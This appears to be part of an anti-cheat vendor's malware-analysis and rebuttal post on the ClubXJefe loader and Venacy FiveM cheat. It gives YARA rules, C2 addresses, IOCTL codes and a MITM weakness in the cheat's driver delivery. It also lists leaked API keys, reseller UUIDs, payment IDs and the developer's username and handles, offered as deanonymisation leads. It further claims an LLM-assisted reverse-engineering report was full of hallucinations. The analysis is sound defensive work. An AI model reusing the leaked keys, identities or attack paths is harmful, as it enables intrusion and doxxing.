        return float4(tintColor.rgb * lightIntensity, 1.0f);
    return float4((color.rgb * tintColor.rgb * lightIntensity), color.a);
}
// Three modes: solid tint, glow/outline, textured tint
// lightIntensity = cheap fake lighting to make targets visible
// regardless of in-game conditions

Venacy reseller binary — the companion product

venacyexternal5m7.exe shares the same developer and codebase as the upstream loader. Key correction from Part 1: the Venacy binary is NOT a browser stealer — that capability lives exclusively in edputil.dll. Venacy is the cheat frontend; edputil.dll is the loader/stealer backend.

WebSocket live screen relay

Continuous JPEG streaming via WinHTTP WebSocket API (WinHttpWebSocketCompleteUpgrade/Send/Receive/Close at offsets 0x00E8A0D0–0x00E8A1F0). The channel is bidirectional — the server can push arbitrary JSON commands to every connected client. Relay endpoint: POST /v1/pov/load?token=… on 198.89.99.206:3001.

HDCP-bypassing kernel screen capture

Captures via kernel device \\.\DxgKrnlEtw — bypasses HDCP, SetWindowDisplayAffinity(WDA_EXCLUDEFROMCAPTURE), and every anti-screencap API. DRM-protected windows (Netflix, banking apps, encrypted messengers) are captured identically to everything else.

728 cheat feature keys (567 deduplicated)

Combat: 162 keys (aimbot, triggerbot, silent aim, bone priority, prediction). Visuals: 157 keys (ESP, chams, tracers, skeletons, health bars). Misc: 202 keys (godmode, noclip, teleport, speed hack). Vehicles: 30 keys. Settings: 94 keys. Three HLSL shader modes for wallhack: tinted, glow-only, textured-tint.

White-label reseller system

CLI flag --reseller-key <UUID> fetches branding from http://198.89.99.206:3001/v1/public/resellers/branding/<UUID> — unauthenticated. Three known resellers: xerlock (wagxlk), Jefe Xternal (Jefe), exiledGG (hispect). Runtime theme injection via REST endpoint.

No certificate pinning (corrected from Part 1)

The sha256// and -----BEGIN PUBLIC KEY----- strings are empty libcurl boilerplate templates. No SHA-256 pin hash hardcoded. Second HTTP stack sets WINHTTP_OPTION_SECURITY_FLAGS = 9 (relaxed TLS). Anyone with a rogue CA can MITM the entire pipeline and inject an arbitrary kernel driver.

Shared codebase with edputil.dll

Same HWID collection (12 components), same anti-debug checks, same BYOVD approach (kdmapper/Nal instead of custom mapper), same developer (vados). Corrected from Part 1: NOT a browser stealer (that's edputil.dll only). The Venacy binary is the cheat frontend; edputil.dll is the loader/stealer backend.

Fake PE metadata

CompanyName: "Starter Apps LLC". FileDescription: "Screen Overlay Manager". OriginalFilename: "overlay_manager.exe". Manifest identity: "DisplayConfigurationUtility". None of these companies exist. requireAdministrator UAC — social-engineers users past SmartScreen.

D3D11 overlay with HLSL shaders

Full vertex + pixel shader recovered at 0xE51800–0xE51F00. chamsMode==1: solid tint. chamsMode!=1 && tintColor.a<0.001: glow/outline. chamsMode!=1 && tintColor.a>=0.001: textured tint. lightIntensity = 0.7 + 0.3*|norm.z| — cheap fake lighting to make targets visible regardless of in-game conditions.

8 custom IOCTL codes

0x88991C00 (init/handshake), 0x88991C04, 0x88991C0C, 0x88991C10 (kernel READ), 0x88991C14 (kernel WRITE), 0x88991C18, 0x88991C1C (IOCTL_VNC_PING), plus Intel 0x80862007 (NAL driver). Part 1 only documented one.

Cryptographic failures — hostile-server-tolerant by design

Three concrete crypto failures that, combined, mean anyone able to MITM the connection can inject an arbitrary kernel driver into any paying customer's machine. Not theoretical. Architecturally true.

No TLS certificate pinning (confirmed in Part 2 & 3)

The sha256// and -----BEGIN PUBLIC KEY----- strings in the binary are empty libcurl boilerplate templates at 0xA9C69D/0xA9C6FA. No SHA-256 pin hash is hardcoded. No CURLOPT_PINNEDPUBLICKEY call exists. The second HTTP stack sets WINHTTP_OPTION_SECURITY_FLAGS = 9 (relaxed TLS). Rogue CA, compromised intermediate, or CT-log abuse → transparent MITM.

Decrypt-only AES-256-GCM — server is fully authoritative

All BCrypt usage is one decrypt wrapper at VA 0x14032050C. No BCryptEncrypt, no BCryptDeriveKey, no KDF of any kind. The wrapper is called twice: outer decrypt, then the outer plaintext is fed back as the next ciphertext. Inner key embedded in outer plaintext — no client-side derivation. Wire format: [3-byte prefix][12-byte nonce][ciphertext][16-byte GCM tag], no AAD. A MITM injects a crafted encrypted_key blob → client decrypts it → recovered bytes become the unsigned kernel driver payload. Game over.

MD5 → RC4 for HWID “protection”

CryptCreateHash(CALG_MD5 = 0x8003) at 0x14098C2C8, followed by CryptImportKey + CryptEncrypt at 0x14098AC0F — the classic MD5→RC4 obfuscation pattern from 1990s shareware. MD5 is collision-broken. RC4 has been forbidden by every modern TLS standard for a decade. Cryptographic amateur-hour.

Login response parsed by regex, not a JSON parser

The reseller binary parses login responses with literal regex: "encrypted_key":"([^"]+)", "user_id":"(\d+)". Not a JSON parser. A MITM can inject malformed JSON that the regex happily matches, feeding the client a hand-crafted kernel driver payload.

Backend recon — their own panel laid bare

Public FAQ confirms the business model

  • Privately owned by Jefe. Management team reachable through Discord only. Admits sole proprietorship.
  • Left Binary for full control over bypass pipeline, custom builds, stricter no-leak policy. Admits previous reselling ("Binary") and breaking away. Now resells Venacy.
  • Club44 was earlier project. ClubXJefe rebuilt from scratch. Confirms Club44 → ClubXJefe lineage.

Pricing tiers

TierPrice (EUR)Note
SOLO€350 one-time / lifetimeCustom bypass, premium cheat, personal inject/destruct
DUO€234 / personMost promoted tier
GROUP€117 / person (min 6)
PRIVATE€47 / month
SLOTTED€174 / slot (max 13)"Jefe Slotted 3" — 1/12 sold

Payment processors: live Stripe (cs_live_), MercadoPago (APP_USR-ef327ef7-eb56-4aaf-a01b-f12ca2c310ef), PayPal (paypalme/jefebypass). All in Euro.

Business volume (their own stats endpoint)

Active customers

275

Bypasses delivered

34,325

Cheats available

3

Claimed uptime

99.9%

Three known Venacy resellers

ResellerUsernameDiscordReseller key
xerlockwagxlkdiscord.gg/uWMSmuV6bdf85d922-355f-48f1-ba2c-f7aa11e08dea
Jefe XternalJefediscord.gg/jefebp365c4ba4-1f17-4911-9c1a-0e23f8d51ecf
exiledGGhispectdiscord.gg/exiledgg83ce0d88-00d4-4dac-bfc9-43045d91776b

The middle row is Jefe. His reseller UUID 365c4ba4-1f17-4911-9c1a-0e23f8d51ecf is the exact value leaked through the Discord OAuth flow — his own reseller key, exposed because the OAuth redirect target was the dev-mode default https://0.0.0.0:3000/dashboard/settings.

R2 storage paths

Bucket:  venacy.aec9c57cb030957fe8bd13ff2c096ecf.r2.cloudflarestorage.com
Cred ID: 2057cbe81b66664605c944a6b5a84bad

Files:
  downloads/fivem-external/loader/1779762029002-venacy-loader.exe
  downloads/fivem-external/cheat/1782186455638-venacy-external-5m.exe
  downloads/reseller/fivem-external/1782186250800-venacy-external-5m.exe
  downloads/reseller/fivem-external-pov/1781204173599-venacy-external-5m.exe

Other backend exposures

  • Fake .env honeypots at well-known paths with “HACKER DETECTED” — they have honeypots for naive scanners and still leaked the entire attack surface anyway.
  • WebSocket endpoint wss://*.venacy.club whitelisted in CSP but returns 502/504 — broken in production, never fixed.
  • Public stats/product/category/reseller endpoints are completely unauthenticated — anyone can enumerate the full product catalogue with R2 paths and internal IDs.
  • Forum system exists with categories but has zero threads. Launched and abandoned.
  • Brazilian payment processor (MercadoPago) in CSP, frontend in pt-BR. Consistent with Portuguese strings in the binary. Operator country: Brazil.

AI / no-code stack — Lovable/v0/Bolt fingerprints everywhere

Their accusation post called our website “AI-generated.” Apply the same lens to their own stack and the fingerprints are unmistakable.

Stack: Next.js front + NestJS back — the default Lovable export

Origin 185.242.3.132 runs Next.js on :443 behind nginx and NestJS on :3000. Reseller side: second NestJS on :3001. Next.js + NestJS is the exact tuple Lovable/v0/Bolt emit when you ask for "a SaaS panel with an API."

Backend binds to 0.0.0.0 — the npm run dev default, never changed

Discord OAuth callback leaks https://0.0.0.0:3000/dashboard/settings. A human admin would bind to 127.0.0.1:3000 behind nginx. The NestJS panel is reachable directly on the public IP, bypassing their own Cloudflare WAF.

Wildcard DNS → 127.0.2.2 — Cloudflare default, never revised

*.clubxjefe.com → 127.0.2.2. The Cloudflare quickstart config, pasted and never revisited.

Glyphter custom icon font — a no-code drag-and-drop generator

Custom TTF built with FontForge on 2024-06-14 by author handle "punish". Glyphter (glyphter.com) is aimed at people who do not know how to make icon fonts. Ships a literal EULA inside the malware loader (RCDATA #108).

Runtime theme injection from unauthenticated REST endpoint

/v1/public/resellers/branding/<KEY> returns theme_primary, theme_secondary, logo_url, company_name — unauthenticated. Anyone can enumerate every reseller and pull their branding. This is the Lovable/Bolt "multi-tenant SaaS" boilerplate.

Discord OAuth flow is the bug — dev-mode redirect URI shipped to production

The redirect target https://0.0.0.0:3000/dashboard/settings is how the entire panel architecture (port, bind, route, UUID) was extracted in an afternoon by anyone who clicked login.

Developer OPSEC — identity leaked through their own binaries

The person who wrote the post calling our scanner an infostealer left their Windows username, native language, profanity habits, and modding-scene provenance embedded in their own malware loader.

Windows username: vados

The reseller binary's embedded 3D character textures carry the literal path C:\Users\vados\Desktop\characters\franklin\head_diff_000_c_bla_1.png (and five other identical paths). The dev's Windows account name, their desktop layout, proof the asset pipeline ran on the same workstation that compiles the loader.

Second handle: punish (font author)

The Glyphter custom font is signed in its TTF metadata with author handle "punish" (FontForge, 2024-06-14). Either a second contributor or an alias.

Native language: Portuguese — confirmed twice

(a) FACEIT abort message: "FACEIT Anti-Cheat foi detectado neste PC…" — Portuguese. (b) Kernel driver PDB path: D:\INJECTDESTRUCTSPORRATODA — "PORRA TODA" is Portuguese profanity ("the whole fucking thing"). The developer named their own product "inject-destruct-fuck-everything."

GTA pirate-modding scene origin

Embedded models carry "Exported from 3ds Max v0.97b on 2014-01-21" — the Bero Wavefront OBJ exporter that has been the de-facto GTA modding tool for a decade. Combined with Franklin character textures: GTA-modding veteran who pivoted into paid cheats.

Influencer/staff/admin tier in the protocol

Login response field "role": "user|staff|admin|early|influencer". The schema explicitly carves out an influencer tier — comped access in exchange for promotion. Useful OSINT vector.

Four hardcoded API-key candidates

684297b1aed333cb, 7aa6ee75e3331568, 8659410632115711, b488ab9ed912c310 — 16 hex chars each (64 bits), short, low-entropy, hardcoded. The runtime x-api-key header assembled from all four. Anyone who pulls the binary has them.

Reseller logos on Imgur

Branding logos pulled from i.imgur.com/ntd73SO.png and i.imgur.com/Y61SPxB.png. Imgur IDs are correlatable — one DMCA away from unmasking the uploader.

Engineering quality: one mistake stacked on another

The people accusing us of being an infostealer wrote a product so badly that read-only access to its binary surfaced their entire administrative architecture in an afternoon.

1. PDB path names their deletion logic in Portuguese

D:\INJECTDESTRUCTSPORRATODA\...\RTCore64.pdb — in plaintext after a 1-byte XOR. Real malware authors strip PDB paths.

2. Discord OAuth leaks their admin URL

https://0.0.0.0:3000/dashboard/settings — discloses backend port, bind address, and admin route. The most basic OAuth misconfiguration possible.

3. "Encryption" is a 4-byte rolling XOR

1,257 strings wrapped in a single decryption function at RVA 0x12d1c0. Find one function → decrypt everything.

4. C2 is bare HTTP on a hard-coded IP

http://185.242.3.132:3000/v1. Not HTTPS. Not behind a domain. Every stolen credential in cleartext.

5. Reseller binary doesn't even bother with XOR

venacy.club in plaintext at offset 0xB33E08. Every REST path is a literal string in .rdata.

6. Fake version metadata: "Starter Apps LLC"

CompanyName="Starter Apps LLC", FileDescription="Screen Overlay Manager". None of these companies exist.

7. Three identical copies of RTCore64.sys

Same 8.5 KB driver, byte-identical, three offsets. Same hash → same blocklist entry. 25 KB of detection surface for nothing.

8. FACEIT error message is in Portuguese

"FACEIT Anti-Cheat foi detectado neste PC…" — not even localized for their English-speaking customers.

9. Cheat driver internal name: literally "clubxjefe"

The unsigned kernel driver identifies itself in cleartext. ImGui overlay renders "clubxjefe driver connected." Brand bound to the kernel artifact.

10. Reseller logos hosted on Imgur

i.imgur.com/ntd73SO.png, i.imgur.com/Y61SPxB.png. Correlatable Imgur IDs.

The people who wrote a 25-claim accusation calling our forensic scanner an infostealer wrote a malware loader that ships its developer's source-tree path in plaintext, communicates over unencrypted HTTP to a hard-coded IP, leaks its admin panel through its own Discord OAuth flow, embeds three identical copies of the same vulnerable driver, and brands the kernel artifact with the operator's own trade name. The disparity between their accusation and their own engineering hygiene is the substance of this post.

YARA signatures & IOCs

edputil.dll YARA rule

rule CLUBXJEFE_EDPUTIL_LOADER {
    meta:
        description = "ClubXJefe upstream loader (edputil.dll)"
        author      = "Clubhouse Research"
        date        = "2026-06"

    strings:
        $svc  = "DxpTaskHost"
        $pdb  = "INJECTDESTRUCTSPORRATODA"
        $drv  = "clubxjefe"
        $c2   = { 31 38 35 2E 32 34 32 2E 33 2E 31 33 32 }  // 185.242.3.132
        $xor  = { 48 }                                         // XOR key byte
        $api1 = "/auth/login"
        $api2 = "/auth/event"
        $api3 = "/auth/report-security"
        $mtx  = "CSCHost_Loader_Mtx_7F3A"

    condition:
        uint16(0) == 0x5A4D and filesize > 3MB and filesize < 5MB and
        $svc and ($pdb or $drv) and $c2 and 2 of ($api*)
}

Venacy YARA rule

rule VENACY_EXTERNAL {
    meta:
        description = "Venacy External FiveM cheat"
        author      = "Clubhouse Research"
        date        = "2026-06"

    strings:
        $ep1  = "/v1/auth/report-security"
        $ep2  = "/v1/public/resellers/branding/"
        $ep3  = "/v1/auth/heartbeat"
        $hw1  = "hwidComponents"
        $hw2  = "monitorHwid"
        $dr1  = "[MapperLoader] driverData is null (CODE=35)"
        $dr2  = "IOCTL_VNC_PING"
        $dr3  = "DxgKrnlEtw"
        $io1  = { 00 1C 99 88 }    // 0x88991C00 init
        $io2  = { 10 1C 99 88 }    // 0x88991C10 read
        $io3  = { 14 1C 99 88 }    // 0x88991C14 write
        $io4  = { 1C 1C 99 88 }    // 0x88991C1C ping
        $nal  = { 07 20 86 80 }    // Intel 0x80862007
        $sh1  = "chamsMode"
        $sh2  = "mWorldViewProj"
        $ad1  = "ProcessDebugObjectHandle=0x"
        $rs1  = "--reseller-key"
        $bl1  = "EasyAntiCheat.exe" wide

    condition:
        uint16(0) == 0x5A4D and filesize > 10MB and
        all of ($ep*) and (3 of ($io*) or $nal) and
        2 of ($sh*) and $rs1 and $bl1
}

Network IOCs

TypeValueContext
IPv4185.242.3.132Primary C2 (edputil.dll) — port 3000
IPv4198.89.99.206Reseller C2 (Venacy) — port 3001
Domainvenacy.clubVenacy frontend (plaintext in binary)
Domainclubxjefe.comClubXJefe frontend
Domain*.clubxjefe.com → 127.0.2.2Wildcard DNS (Cloudflare default)
R2 Bucketvenacy.aec9c57cb030957fe8bd13ff2c096ecf.r2.cloudflarestorage.comFile storage
MutexLocal\CSCHost_Loader_Mtx_7F3ASingle-instance lock
ServiceDxpTaskHostPersistence service name
Cert CNDXP Software SolutionsSelf-signed cert — fictional company

Their reverse-engineering methodology (and why so much is wrong)

Their post opens with “Method: IDA Pro 9.x, full decompile, XORSHIFT32 byte-by-byte decryption, static memory analysis.” Reading carefully reveals the pattern: they loaded the scanner into IDA, attached an LLM via an IDA→MCP bridge, asked the LLM what each function did, and stitched the replies into a “report.” The result is littered with LLM hallucinations.

Examples of LLM hallucinations in their report

Kernel callbacks installed by the scanner

Those API names are detection labels — the scanner reports when something else registers those callbacks. The LLM saw the string and decided the surrounding code "looked like callback installation." Our driver registers zero kernel callbacks.

RunOnce × 3 persistence

"RunOnce" appears three times as a detection label. The scanner has no service, no task, no Run key. The LLM saw the string three times and inferred persistence.

WiFi password theft via WlanGetProfile

Our import table does not contain WlanGetProfile and does not link wlanapi.dll. The LLM extrapolated from the field name "wpass" in the JSON schema.

JWT theft from browsers

CryptUnprotectData is not in our import table. The LLM read "eyJ" near a domain string and inferred token harvesting.

Persistent screenshots after termination

The scanner is single-shot with no persistence mechanism. The LLM's "helpful" follow-on speculation, written as fact.

HASubmitFile as hidden exfiltration

"HA" stands for Hybrid Analysis (hybrid-analysis.com) — a public malware sandbox. The LLM didn't know the abbreviation.

Our analysis of their binaries was performed using proprietary tooling in an isolated lab environment. The PDB paths were embedded in plaintext, their entire string table was recovered after defeating the cipher, and every IOC is reproducible from the original samples. The clean way to do RE is to trace every cross-reference and only assert behavior the binary actually exhibits — not to paste LLM summaries into a report and call it analysis.

Industry comparison

CapabilityFACEITBattlEyeEACVanguardClubhouseClubXJefe
Kernel driverYesYesYesYes (boot)Yes (read-only)Yes (5 BYOVD)
Persistent serviceYesYesYesYesNoYes (DxpTaskHost)
Process terminationYesYesYesYesNoYes (SYSTEM token)
Kernel callbacksYesYesYesYesNoNo
Memory scanYesYesYesYesNoYes (R/W)
Browser readsYesYesYesYesYes (bounded)Yes (DPAPI decrypt)
Credential theftNoNoNoNoNoYes (Discord+Steam+24 browsers)
Screen streamingNoNoNoNoNoYes (HDCP bypass)
DSE/HVCI disableNoNoNoNoNoYes (persists reboots)
Process hiding (DKOM)NoNoNoNoNoYes
WdFilter patchingNoNoNoNoNoYes
Remote brick (NtShutdownSystem)NoNoNoNoNoYes
Report visible to userNoNoNoNoYesNo
Self-destruct after usen/an/an/an/aYesYes (evidence cleanup)

Anti-cheat columns per public documentation and independent RE literature. ClubXJefe column per this analysis. Clubhouse column reviewable by operators under NDA.

Acknowledged residuals

  • YARA rules ship to the scanner. The rule corpus is still client-side. An attacker who completes the handshake can extract rules from process memory. Server-side execution is a planned refactor.
  • BYOVD load path. The first-party sensor uses iqvw64e.sys (Intel) as the primary kernel transport, with gdrv.sys (GIGABYTE) as the fallback, as disclosed in our Terms of Service. Both will eventually be caught up by the Microsoft Vulnerable Driver Blocklist on systems where it is enforced.
  • Lifecycle screenshots. Three multi-monitor desktop screenshots at lifecycle points. Documented in source; will be surfaced more prominently in the privacy doc.

Closing

Vendors who sell paid cheating products have an incentive to discredit the tools that catch their customers. We will continue to publish what the scanner does, acknowledge what it does not do well, and respond to specific technical claims with specific technical answers. Operators and players are welcome to request an audit of the scanner source under NDA at any time.

The people behind ClubXJefe and Venacy sell kernel malware disguised as a cheat product. Their loader steals credentials, their cheat streams the customer's desktop to their server, and their installer permanently destroys the customer's system security — all while the developer's Windows username, native language, and profanity-laden project folder name are embedded in plaintext in the binary they ship. This is the operation that published a report calling us an infostealer.